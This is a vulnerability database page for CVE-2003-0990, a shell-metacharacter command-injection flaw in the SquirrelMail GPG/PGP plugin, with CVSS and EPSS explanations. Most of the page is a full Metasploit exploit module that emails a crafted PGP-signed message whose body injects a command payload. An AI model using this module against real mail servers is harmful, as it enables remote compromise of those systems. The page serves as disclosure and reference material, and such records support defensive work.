CVE-2003-0990 : Detail


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12h57 +00:00
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CVE Descriptions

The parseAddress code in (1) SquirrelMail 1.4.0 and (2) GPG Plugin 1.1 allows remote attackers to execute commands via shell metacharacters in the "To:" field.

CVE Informations


Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]


EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16888

Publication date : 2010-08-24 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: squirrelmail_pgp_plugin.rb 10148 2010-08-25 20:31:46Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver def initialize(info = {}) super(update_info(info, 'Name' => 'SquirrelMail PGP Plugin command execution (SMTP)', 'Description' => %q{ This module exploits a command execution vulnerability in the PGP plugin of SquirrelMail. This flaw was found while quickly grepping the code after release of some information at Later, iDefense published an advisory .... Reading an email in SquirrelMail with the PGP plugin activated is enough to compromise the underlying server. Only "cmd/unix/generic" payloads were tested. }, 'License' => MSF_LICENSE, 'Version' => '$Revision: 10148 $', 'Author' => [ 'Nicob <nicob[at]>' ], 'References' => [ ['CVE', '2003-0990'], ['OSVDB', '3178'], ['URL', ''], ['URL', ''], ['URL', ''], ], 'Stance' => Msf::Exploit::Stance::Passive, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet', } }, 'Targets' => [ [ 'SquirrelMail PGP plugin < 2.1', {} ], ], 'DisclosureDate' => 'Jul 9 2007', 'DefaultTarget' => 0)) end def mime_defaults() self.header.set("MIME-Version", "1.0") self.header.set("Content-Type", "multipart/signed; boundary=\"#{self.bound}\"; protocol=\"application/pgp-signature\"; micalg=pgp-sha1") self.header.set("Subject", '') # placeholder self.header.set("Date","%a,%e %b %Y %H:%M:%S %z")) self.header.set("Message-ID", "<"+ Rex::Text.rand_text_alphanumeric(rand(20)+40)+ "@"+ Rex::Text.rand_text_alpha(rand(20)+3)+ ">" ) self.header.set("From", '') # placeholder self.header.set("To", '') # placeholder end def exploit body = # Display some junk rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + rand_text_alphanumeric(rand(128)+16) + "\n" + # Scroll down "\n" * (rand(100)+35) + # Escape filter and insert payload "AAAA\\\";" + payload.encoded + ";echo \\\"BBBBB\n" sig = "-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG\n\n " + rand_text_alphanumeric(rand(20)+54) + "\n" + rand_text_alphanumeric(rand(20)+34) + "\n" + "-----END PGP SIGNATURE-----\n" msg = msg.extend(MessageExtend) msg.mime_defaults msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) = datastore['MAILTO'] msg.from = datastore['MAILFROM'] msg.add_part(body, "text/plain;charset=us-ascii;format=flowed", "quoted-printable", nil) msg.add_part(sig, "application/pgp-signature", nil, "attachment; filename=signature.asc") send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end end

Products Mentioned

Configuraton 0

Squirrelmail>>Gpg_plugin >> Version 1.1

    Squirrelmail>>Squirrelmail >> Version 1.4.0

    Tags : mailing-list, x_refsource_BUGTRAQ
    Tags : vdb-entry, x_refsource_BID
    Tags : mailing-list, x_refsource_BUGTRAQ